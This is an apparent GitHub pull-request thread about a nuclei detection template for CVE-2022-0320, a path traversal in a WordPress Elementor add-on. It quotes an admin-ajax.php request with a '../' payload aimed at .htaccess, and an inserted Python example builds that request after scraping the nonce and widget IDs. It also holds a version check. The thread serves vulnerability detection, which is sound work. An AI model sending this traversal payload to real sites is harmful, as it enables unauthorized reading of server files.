
Create CVE-2022-0320.yaml

Open princechaddha opened this issue 2 years ago • 4 comments

Template / PR Information

  • Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
  • References:

Template Validation

I've validated this template locally?

  • [ ] YES
  • [ ] NO

Additional Details (leave it blank if not applicable)

Additional References:

princechaddha · May 11 '22 18:05

Hi @akincibor, in the request

action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid

There are some interesting parameters to check

  • page_id
  • widget_id
  • nonce

Can you explain where you got the values for these parameters?

Because I think it's impossible to create the template: the attacker needs to find the page that contains the post grid button first to get the values of page_id, widget_id and the nonce token, and then they can request wp-admin/admin-ajax.php.

daffainfo · May 16 '22 14:05

But if someone makes a template to check the version, I think it's still possible :)

daffainfo · May 16 '22 14:05
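The two points raised above (the admin-ajax.php request only works with a page_id, widget_id and nonce scraped from a page that renders the Post Grid widget, and a version check is the workable fallback), as an added example that is not part of this PR thread or of the nuclei-templates project. The `data-page-id` / `data-widget-id` / `data-nonce` attributes it scrapes, the sample page and the sample `readme.txt` are all constructed for the example and are not the plugin's real markup; the patched version is passed in by the caller because the thread does not state it.

```python
"""Added example (not from the PR thread or the nuclei-templates project).

1. build_load_more_request(): the load_more request quoted in the thread needs
   page_id, widget_id and nonce, which only exist on a page rendering a Post
   Grid widget, so a scanner has to scrape them first.  The attribute names
   used for scraping here are a constructed assumption, not the plugin's real
   markup.

2. is_vulnerable_version(): the version-check fallback suggested in the
   thread.  Reads the "Stable tag" line of a WordPress plugin readme.txt and
   compares it with a caller-supplied fixed version (the thread does not state
   the patched release, so it is not hard-coded).
"""
import re
from urllib.parse import parse_qs, urlencode

# Constructed sample of a page rendering a Post Grid widget (attribute names assumed).
SAMPLE_PAGE_HTML = """
<html><body>
<div class="eael-post-grid" data-page-id="5512" data-widget-id="19f1b2c"
     data-nonce="7c9c8da06d"></div>
<button class="eael-load-more-button">Load More</button>
</body></html>
"""

# Constructed sample readme.txt header, as served from wp-content/plugins/<slug>/readme.txt.
SAMPLE_README = """=== Essential Addons for Elementor ===
Contributors: wpdevteam
Tags: elementor
Stable tag: 5.0.4
"""

ADMIN_AJAX = "/wp-admin/admin-ajax.php"


def extract_widget_params(html):
    """Pull page_id, widget_id and nonce from a rendered Post Grid page.

    Returns None when any of the three is missing, which is the situation the
    thread describes as making a blind template impossible.
    """
    found = {}
    for key in ("page-id", "widget-id", "nonce"):
        m = re.search(r'data-%s="([^"]+)"' % re.escape(key), html)
        if not m:
            return None
        found[key.replace("-", "_")] = m.group(1)
    return found


def build_load_more_request(html, file_name):
    """Return (path, urlencoded body) for the load_more action, or None.

    file_name goes into template_info[file_name], the parameter that carried the
    traversal sequence in the request quoted in the thread.
    """
    params = extract_widget_params(html)
    if params is None:
        return None
    args = urlencode({
        "orderby": "date", "order": "desc", "ignore_sticky_posts": "1",
        "post_status": "publish", "posts_per_page": "4", "offset": "0",
        "post_type": "post",
    })
    body = urlencode({
        "action": "load_more",
        "class": "Essential_Addons_Elementor\\Elements\\Post_Grid",
        "args": args,            # nested query string, encoded once more
        "page": "2",
        "page_id": params["page_id"],
        "widget_id": params["widget_id"],
        "nonce": params["nonce"],
        "template_info[dir]": "lite",
        "template_info[file_name]": file_name,
        "template_info[name]": "Post-Grid",
    })
    return ADMIN_AJAX, body


def decode_body(body):
    """Decode a urlencoded body into a {key: first value} dict (for inspection)."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def parse_version(text):
    """'5.0.4' -> (5, 0, 4); ignores trailing suffixes such as '-beta'."""
    m = re.match(r"(\d+(?:\.\d+)*)", text.strip())
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def stable_tag(readme):
    """Return the 'Stable tag' value from a plugin readme.txt, or None."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


def is_vulnerable_version(readme, fixed_version):
    """True when the readme's stable tag is strictly older than fixed_version."""
    tag = stable_tag(readme)
    installed = parse_version(tag) if tag else None
    fixed = parse_version(fixed_version)
    if installed is None or fixed is None:
        return False                      # unknown version: do not flag
    n = max(len(installed), len(fixed))   # pad so (5, 0) compares with (5, 0, 5)
    return installed + (0,) * (n - len(installed)) < fixed + (0,) * (n - len(fixed))


if __name__ == "__main__":
    path, body = build_load_more_request(SAMPLE_PAGE_HTML, "../../../../../../.htaccess")
    print("POST", path)
    print(body)
    print("stable tag:", stable_tag(SAMPLE_README))
```

The request builder is the part a scanner cannot do blindly: without a prior GET of a page that exposes the widget, `extract_widget_params` returns None and no admin-ajax.php request can be formed, which is why the version check against `readme.txt` is the practical detection.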

You're right, I didn't pay attention to that.

akincibor · May 16 '22 14:05

No problem bro, keep it up. I am always waiting for your template :))

daffainfo · May 16 '22 14:05

I am closing this PR due to inactivity and the team not being able to reproduce the CVE with this template.

princechaddha · Oct 19 '22 09:10